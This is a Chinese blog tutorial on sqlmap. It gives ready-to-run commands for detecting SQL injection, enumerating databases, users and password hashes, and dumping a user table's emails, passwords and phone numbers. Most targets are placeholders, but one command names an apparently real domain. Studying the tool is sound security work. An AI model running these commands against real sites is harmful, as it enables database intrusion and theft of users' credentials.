渗透神器sqlmap的使用笔记
0x00前言
sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。该开源软件是国外大神的慷慨赠予。在乌云、补天等等漏洞公开平台,随处可见它的身影,也是渗透人员的必备神器。能够把这神器灵活运用,也是很厉害的一件事情。熟能生巧!!
下载地址:https://github.com/sqlmapproject/sqlmap#最快的使用,不过有点麻烦咯
集成环境:http://pan.baidu.com/s/1hssCKQS#Appie 里面安装了sqlmap
集成系统:https://www.kali.org/downloads/#kali-Linux下安装有sqlmap
0x01 发现注入点
强调:sqlmap 并不擅长发现注入点,所以必须通过其他方式发现注入点。这些方式有:使用AWVS 进行漏扫、APPSCAN漏扫、burpsuite进行检测、手工挖掘(经验很重要),因为本文重点是介绍在发现注入点之后的工作,所以不对如何发现注入点进行详细介绍。我们需要使用txt文本来记录下注入点的地址和数据。作为后面参数的输入。
0x02 检测注入点
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.PHP?pid=7" --random-agent
实践1 : 因为众多的原因,测试过程会出现很多的 “ [Y/n] ” 之类的提示。我们可以附加参数 --batch
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --random-agent --batch
实践2 :为了加快速度和增加检测的多样性
sqlmap -u "http://www.XXX.cn:80/ldxx/ldxx.php?pid=7" --data="item=1" --level=5 --risk=3 --ignore-proxy --delay=2 --timeout=60 --threads=6
实践3:进行表单数据注入
sqlmap -u "http://www.XXX.cn/admins" --forms
实践4:当我们进行手机服务端的注入时
sqlmap -u "http://www.ahujhc.cn:80/ldxx/ldxx.php?pid=7" --mobile --time-sec=30
实践5:使用文本导入数据
sqlmap -r E:\temporary\www.XXX.cn.txt --random-agent --batch --level=3 --risk=3 --timeout=60 --threads=3 --ignore-proxy --delay=2
0x03 暴力破解数据库名称和数目
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --dbs --thread=3
实践1: 可以附加的参数为: --union-cols=1-30 --union-char=NULL,CHAR
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --dbs --thread=3 --union-cols=1-30 --union-char=NULL,CHAR
实践2:列出web当前使用的数据库
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --current-db
实践3:尽可能详细的信息
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" -b --current-db --privileges --is-dba --current user --roles --users --hostname --passwords --comments -v 0
0x04 暴力破解一个数据库中的所有表
$ sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 --tables
0x05 读取某个数据库中个某表的所有列
$ sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 -T web_user --columns
0x06 读取列中的具体内容
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 -T web_user -C "Email,Password,Tel,Uname,Username" --dump
实践1 :如果数据过大,可以抽取一部分数据
sqlmap -u "http://www.XXX.cn:80/ldxx/ldxx.php?pid=7" -D jhxy2 -T web_user -C" Email,Password,Tel,Uname,Username" --start=1 --stop=10 --dump
渗透神器sqlmap的使用笔记相关推荐
- SQL注入测试神器sqlmap
点击上方蓝字"开源优测"一起玩耍 声明 本公众号所有内容,均属微信公众号: 开源优测 所有,任何媒体.网站或个人未经授权不得转载.链接.转贴或以其他方式复制发布/发表.已经本公众 ...
- 在安卓手机搭建kali环境,手机变成便携式渗透神器
最近在电脑上玩kali虚拟机感觉还是不方便,就试着在手机上试了一下. 我先试的linux deploy 感觉还是太复杂而且还没安装成功 最后我用termux 试了下感觉挺好下面介绍如何在Android ...
- pocsuite渗透神器介绍
pocsuite渗透神器介绍 optional arguments:-h, --help Show help message and exit--version Show program's vers ...
- 『安全工具』注入神器SQLMAP
原文: 『安全工具』注入神器SQLMAP Pic by Baidu 0x 00 前言 正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来.... PS:国内类似软件也有阿D,明小子, ...
- 搜索引擎【渗透神器系列】
搜索引擎[渗透神器系列] 搜索引擎是我日常工作中用得最多的一款工具,国内常用的搜索引擎包括Baidu,sougou ...
- 【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-终
后续笔记仔细看了下,放出来铁过不了审核,等有时间一点点删了再放出来. [小迪安全]web安全|渗透测试|网络安全 | 学习笔记-8 已经被封了=.= 把目录写上,假装过审核了. 接下来是持续八天的-- ...
- 安卓渗透神器dsploit笔记
之前在freebuf上看到一篇文章Android网络渗透套件测试小记,于是对dsploit感兴趣了.虽然只是两年前的,但是metasploit也有十几年了啊,一个好的作品总会有欣赏他的人玩,毕竟强大~ ...
- 《Metasploit渗透测试魔鬼训练营》学习笔记
Metasploit渗透测试魔鬼训练营学习笔记 法律常识 <中华人民共和国网络安全法>已由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,现予公布 ...
- 【渗透测试】cookie注入笔记
目录 什么是cookie? 什么是cookie注入? Cookie手注流程 一.判断注入点 二.判断字段数 三.判断回显点 四.查询相关内容 补充 答疑 1.为什么是select 1,2 不是 sel ...
最新文章
- MVC项目下 Telerik Upload 的使用方法
- P2P网络“自由”穿越NAT的“秘密”
- 用Xshell连接ubuntu虚拟机
- 华为OJ: 公共字符串计算
- react打包后图片丢失_React中型项目的优化实践
- 02-图像的几何变换
- LeetCode 417. 太平洋大西洋水流问题(BFS/DFS)
- hadoop jar包_计算机毕业设计中hadoop上运行Java程序
- Selenium webdriver中的xpath定位
- java模拟多线程买票问题
- Atitit 登录账号管理法passport 目录 1. 总则	1 1.1. 身份分类登录账号 管理员 操作人员 普通用户	1 1.2. 安全考虑,必须单独分开的账号储存表,使用不同等加密技术与秘
- 页面导出excel的三种方式
- 天堂2游戏登陆服务器源码分析1
- [设计素材]你也在找CTBiaoSongSJ吗?我这里有耶!
- 华为销售专家LTC专家许浩明老师:流程是数字化转型的基础,以华为营销LTC,华为铁三角为例
- 2021大学网课答案搜题公众号
- worksheet怎么读_worksheet是什么意思_worksheet怎么读_worksheet翻译_用法_发音_词组_同反义词_工作表_学习单-新东方在线英语词典...
- 键盘删除键长按只能删除一个字符?--关闭Windows筛选键
- node抓取王者荣耀英雄资料库
- 2005年商业科技盘点:最被低估10大技术+最被高估10大技术